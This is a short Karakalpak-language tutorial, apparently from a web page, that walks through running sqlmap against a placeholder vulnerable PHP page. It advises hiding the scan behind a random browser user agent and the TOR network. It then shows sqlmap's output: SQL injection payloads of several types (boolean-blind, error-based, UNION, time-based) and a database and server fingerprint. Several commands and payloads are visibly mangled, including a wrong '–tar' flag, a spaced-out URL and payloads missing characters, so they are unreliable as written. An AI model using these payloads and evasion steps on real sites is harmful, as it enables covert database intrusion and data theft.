Ssenariy 1
http://www.site.com/vuln.php?id=1 de jaylasqan web bettiń GET metodı menen uzatılatın "id" parametrinde tabılǵan hálsizlikte test qılıp kóremiz. Iskerlikti kemeytiw ushın biz ózimizdi ápiwayı brauzer (--random-agent gilti járdeminde) sıpatında jasıramız hám jalǵanıw ushın qawipsiz TOR tarmaq kanalınnan(--tar) paydalanıwımız múmkin. Keyin sqlmap ti iske túsiremiz:
$ python sqlmap.py -u " http://www. site. com/vuln.php? id=1"--random-agent –tar sqlmap / 1. 0-dev (r4365)
Skaner HTTP(S) sorawlarında bir neshe inekciya orınların anıqlaydı. Bul jerde olardıń hár biri ushın túri, sonıń menen birge paydalı maǵlıwmatlar kórsetiledi.
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind — WHERE or HAVING clause
Payload: id=1 AND 1826=1826
Type: error-based
Title: MySQL >= 5.0 AND error-based — WHERE or HAVING clause
Payload: id=1 AND (SELECT 8532 FROM(SELECT COUNT(),CONCAT(CHAR(58,98,116,120,58), (SELECT (CASE WHEN (8532=8532) THEN 1 ELSE 0 END)),CHAR(58,98,121,102,58),FLOOR(RAND(0)2))X FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY X)A)
Type: UNION query
Title: MySQL UNION query (NULL) — 3 columns
Payload: id=1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,98,116,120,58), IFNULL(CAST(CHAR(74,76,73,112,111,113,103,118,80,84) AS CHAR),CHAR(32)),CHAR(58,98,121,102,58))
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1 AND SLEEP(10)
Bunnan tısqarı, skaner maǵlıwmatlar bazasın hám web programma tárepinen isletiletuǵın basqa texnologiyalardı anıqlaydı:
[02:01:45] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: MySQL 5.0
Keyingi etapta bul maǵlıwmatlar bólek faylǵa jazılıp barıladı.
Dostları ilə paylaş: |